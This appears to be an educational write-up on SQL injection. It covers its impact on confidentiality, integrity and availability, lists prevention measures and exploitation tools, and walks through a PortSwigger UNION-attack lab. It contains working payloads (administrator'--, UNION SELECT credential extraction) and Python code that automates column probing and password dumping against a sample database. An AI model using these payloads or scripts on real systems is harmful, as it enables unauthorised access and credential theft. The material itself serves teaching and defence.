What is SQL injection
“SQL injection is a technique for exploiting web applications that use client supplied data in SQL queries” (Spett, no date:1). SQL injection involves injecting malicious SQL code into web application input fields or parameters with the aim of manipulating the SQL statements the application builds and gaining unauthorised access to the database. By exploiting weak input validation and insufficient data sanitisation, attackers can bypass authentication, retrieve sensitive data, modify records and, depending on the database engine and the privileges of the application's database account, execute commands on the database server.
“This vulnerability affects the main aspects of security i.e. CIA triad” (Rai et al., 2021:2): by exploiting SQL injection vulnerabilities, attackers can compromise the confidentiality, integrity and availability of databases and of the systems that rely on them. “SQL queries are used to execute commands, such as data retrieval, updates, and record removal.” (Online: 2019) An attacker who controls the query therefore controls those operations, so it is essential to implement preventive measures and security best practices to mitigate the risk of SQL injection and protect the CIA triad.
How Can SQL Injections Affect A Company (CIA TRIAD)
Confidentiality: In an SQL injection attack the attacker directly exploits the vulnerability, which occurs when “an attacker inputs malicious strings as parameters in legitimate SQL statement” (Alazab et al., no date:2), to inject SQL code that bypasses the application's security controls and returns data that should have remained hidden. This is a severe vulnerability: exposing confidential information can breach data protection legislation and lead to substantial fines under the GDPR imposed by the ICO, alongside any civil lawsuits, as well as compromising the integrity of the affected system.
Integrity: SQL injection “generally allows an attacker to view data that they are not normally able to retrieve.” (PortSwigger: 2019) The same flaw also poses a serious risk to data integrity, because an injected statement is not limited to reading: attackers can insert, update or delete records, jeopardising the accuracy and reliability of the data. Protecting against SQL injection involves implementing robust security measures and regularly assessing for vulnerabilities in order to maintain the integrity of critical data.
Availability: SQL injection attacks can also disrupt the availability of a database or of the entire application. When “an attacker inputs malicious strings as parameters in legitimate SQL statement” (Alazab et al., no date:2), the resulting queries can crash the database, create denial-of-service (DoS) conditions through expensive or destructive statements, or render the application unavailable to legitimate users, with serious consequences for the organisation and for customer trust.
How To Prevent And Mitigate SQL Injection Attacks
Silva et al. (2020) note that several standards address how “to mitigate SQL Injection attacks” and that “some of those standards are ISO-27002”. In practice, developers should use secure coding practices such as parameterised queries or prepared statements. These techniques keep the SQL code separate from the user-supplied values, so input is only ever treated as data and never as part of the statement. Input validation and sanitisation add a further layer by checking that inputs match what the application expects (type, length, allowed characters) before they are used; validation is a defence in depth, not a substitute for parameterisation, and it is the only option for the places placeholders cannot reach, such as table or column names.
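The following example is added here to show the difference the paragraph describes; it is not code from the original post or from any of the cited sources. It uses Python's built-in sqlite3 module against an in-memory database with constructed sample users, so it runs offline. The login query built by string formatting is bypassed by the payload administrator'-- (the quote closes the literal and -- comments out the password check); the parameterised version treats the same payload as a literal username and matches nothing. The ORDER BY function shows the one case where a placeholder cannot be used and an allowlist check is required instead.

```python
import sqlite3

# Constructed sample data for the example, not taken from any real system.
# Passwords are stored in clear only to keep the example short; a real
# application stores a salted hash and compares against that.
SAMPLE_USERS = [
    ("administrator", "s3cret-admin"),
    ("carlos", "hunter2"),
    ("wiener", "peter"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database with a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Builds the statement by string formatting, so input becomes SQL code.

    A username of  administrator'--  closes the string literal, and the --
    comments out the rest of the statement, including the password check.
    """
    sql = (
        "SELECT id FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterised query: the values are bound separately from the SQL text,
    so a quote or comment sequence in the input is just characters to match."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# Placeholders only bind values. An identifier such as the column name in an
# ORDER BY clause cannot be bound, so it is validated against an allowlist.
ALLOWED_SORT_COLUMNS = frozenset({"id", "username"})


def list_users_sorted(conn: sqlite3.Connection, sort_by: str) -> list:
    """Allowlist validation for the one place parameterisation cannot reach."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    sql = f"SELECT username FROM users ORDER BY {sort_by}"
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    payload = "administrator'--"
    print("vulnerable:", login_vulnerable(db, payload, "wrong-password"))  # [1]
    print("safe:      ", login_safe(db, payload, "wrong-password"))        # []
```

The vulnerable function returns the administrator's id for a wrong password because the executed statement has become SELECT id FROM users WHERE username = 'administrator'; the safe function sends the same SQL text every time and only the bound values change.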
An important point to consider is that an “SQL Injection attack is pretty easy but will often become more complex with trickier targets” (Chuck 2022), so regular security assessments, including penetration testing and code reviews, are vital for identifying and mitigating SQL injection vulnerabilities. By proactively addressing these issues, organisations can enhance web application security and defend against SQL injection attacks.
The “Severity of SQL Injection attacks is limited by the attacker’s skill and imagination, and to a lesser extent” (kingthorin, no date). Skilled attackers can gain unauthorised access, manipulate data and execute commands. However, implementing security measures such as input validation and secure coding practices reduces both the likelihood and the impact of SQL injection. Organisations should proactively assess vulnerabilities and maintain a strong security posture to mitigate the risk of SQL injection attacks.
The SQL injection threat model centres on an attacker who controls some input (a form field, URL parameter, cookie or HTTP header) that the web application concatenates into an SQL query, and who uses that input to change the structure of the query rather than just its values. Understanding this threat model, including which inputs reach queries, what privileges the application's database account holds and whether database errors are returned to the user, helps organisations implement preventive measures and enhance the security of their web applications.
Tools to Utilise For SQL Injection
SQLMap: An open-source tool built to automate SQL injection and database takeover. The “SQLmap penetration testing tool automates the process of detecting and exploiting SQL injection” (Rankothge et al., 2020:2) vulnerabilities.
Burp Suite: A comprehensive web application security testing tool whose intercepting proxy and Repeater are used to find and exploit SQL injection vulnerabilities by capturing requests and replaying them with modified parameters. This matters because “SQL injections affect an access level of web-applications” (Yousaf et al., 2012:2).
Havij: A commercial Windows tool that automates SQL injection attacks, including enumerating and extracting information from databases and gaining unauthorised access.
SQLNinja: An open-source tool for exploiting SQL injection flaws in web applications that use Microsoft SQL Server as the back end. It can gain unauthorised access, execute operating system commands and extract sensitive data from the database.
SQL Power Injector: A lightweight SQL injection tool for testing and exploiting SQL injection vulnerabilities in web applications.
It is important to understand that while these tools can be used to test for and identify serious vulnerabilities, using them against systems without authorisation is illegal and unethical. Organisations should prioritise implementing robust security measures alongside the policies, training and guidelines employees need to follow good practice.
LAB: SQL Injection UNION Attack - Retrieving Multiple Values In A Single Column
I will be completing the PortSwigger Web Security Academy lab “SQL injection UNION attack, retrieving multiple values in a single column”. The aim of this lab is to carry out a UNION-based SQL injection that retrieves every username and password from the users table, even though only one column of the original query can hold text, by concatenating both values into that single column.
To start, browse the shop and click the Accessories category. In Burp Suite's Proxy > HTTP history the request appears as GET /filter?category=Accessories; the category parameter is passed straight into an SQL query, so this URL is where we inject.
Send that request to Repeater so that the category parameter can be modified and different SQL payloads tested until one exploits the application.
The first payload to test is '+UNION+SELECT+NULL-- (the + characters are URL-encoded spaces). This does not test the type of the parameter; it determines how many columns the original query returns, because a UNION only works when both SELECTs return the same number of columns. The response is an HTTP 500 Internal Server Error, which means the column counts do not match and we need to add another NULL.
After adding a second NULL, giving '+UNION+SELECT+NULL,NULL--, and sending it through Repeater, we get an HTTP 200 OK response. The original query therefore returns two columns, so every injected SELECT must also return two.
Next we replace the first NULL with 'abc' ('+UNION+SELECT+'abc',NULL--) and again receive an HTTP 500 error. This means the first column of the original query is not compatible with string data; an HTTP 200 OK would have shown that the first column can hold text.
This time we set the first value back to NULL and the second to 'abc' ('+UNION+SELECT+NULL,'abc'--) to check whether the second column accepts string data. The response is HTTP 200 OK, so the second column can hold text, and that is the column we will use to retrieve the credentials.
Next we put username||'~'||password+FROM+users in the second position, giving '+UNION+SELECT+NULL,username||'~'||password+FROM+users--. The || operator is string concatenation (this lab runs on a database that uses that syntax), and the ~ character is simply a separator we choose so the two values can be told apart afterwards. Sending the request returns HTTP 200 OK, which shows the payload executed successfully.
Scrolling down the response, each injected row appears as username~password, including the administrator's credentials and those of the other users. These passwords can be used to log into the corresponding accounts and access their data.
Finally, go to the login page, enter “administrator” as the username and paste the password taken from the Repeater response. We now have access to the administrator account and the lab is solved.
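The following is an added example that reproduces the lab's steps in code; it is not PortSwigger's lab code or part of the original post. It stands in for the shop with an in-memory SQLite database holding constructed products and users, and the vulnerable filter function concatenates the category parameter into a two-column query exactly as the lab's endpoint does. Column-count probing (steps 1 and 2) and the username||'~'||password extraction (step 5) behave as in the lab; the 'abc' data-type probe (steps 3 and 4) is left out because SQLite is dynamically typed and accepts a string in any column, whereas the lab's database rejects it.

```python
import sqlite3
from typing import Optional

# Constructed stand-in for the lab's shop: a products table queried by the
# category filter, and a users table holding the credentials to extract.
# All data is invented for the example.
PRODUCTS = [
    (10, "Phone Stand", "Accessories"),
    (25, "Laptop Sleeve", "Accessories"),
    (99, "Desk Lamp", "Lifestyle"),
]
USERS = [
    ("administrator", "admin-pass-123"),
    ("carlos", "montoya"),
    ("wiener", "peter"),
]


def make_shop_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (price INTEGER, name TEXT, category TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def filter_products(conn: sqlite3.Connection, category: str) -> Optional[list]:
    """The vulnerable endpoint: the category parameter is concatenated into SQL.

    The original query returns two columns (integer price, text name), which is
    why the lab needs two NULLs. A database error is returned as None, standing
    in for the HTTP 500 the lab server sends back.
    """
    sql = f"SELECT price, name FROM products WHERE category = '{category}'"
    try:
        return list(conn.execute(sql))
    except sqlite3.OperationalError:
        return None


def find_column_count(conn: sqlite3.Connection, base: str = "Accessories",
                      max_cols: int = 10) -> Optional[int]:
    """Steps 1 and 2: add NULLs until the UNION stops failing on a column mismatch."""
    for n in range(1, max_cols + 1):
        payload = base + "' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        if filter_products(conn, payload) is not None:
            return n
    return None


def dump_credentials(conn: sqlite3.Connection, text_col: int, ncols: int,
                     base: str = "Accessories") -> dict:
    """Step 5: pack username and password into the one string column with a
    '~' separator, then split each injected row back into a (user, password) pair."""
    cols = ["NULL"] * ncols
    cols[text_col] = "username||'~'||password"
    payload = base + "' UNION SELECT " + ",".join(cols) + " FROM users--"
    creds = {}
    for row in filter_products(conn, payload) or []:
        value = row[text_col]
        # Genuine product rows come back too; only the injected rows contain '~'.
        if isinstance(value, str) and "~" in value:
            user, _, password = value.partition("~")
            creds[user] = password
    return creds


if __name__ == "__main__":
    db = make_shop_db()
    n = find_column_count(db)
    print("columns returned by the original query:", n)  # 2
    print(dump_credentials(db, text_col=1, ncols=n))
```

With one NULL the statement fails with SQLite's “SELECTs to the left and right of UNION do not have the same number of result columns”, mirroring the lab's 500; with two it succeeds, and the final payload returns the Accessories products alongside one username~password row per user.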
Conclusion
In summary, SQL injection presents a grave risk to web
applications, enabling unauthorized access, data manipulation, and potential
compromise of sensitive information. Mitigating this threat necessitates the
implementation of effective security measures, including input validation and
secure coding practices. Regular security assessments and staying informed
about emerging threats are vital for maintaining a strong defense against this
widespread vulnerability.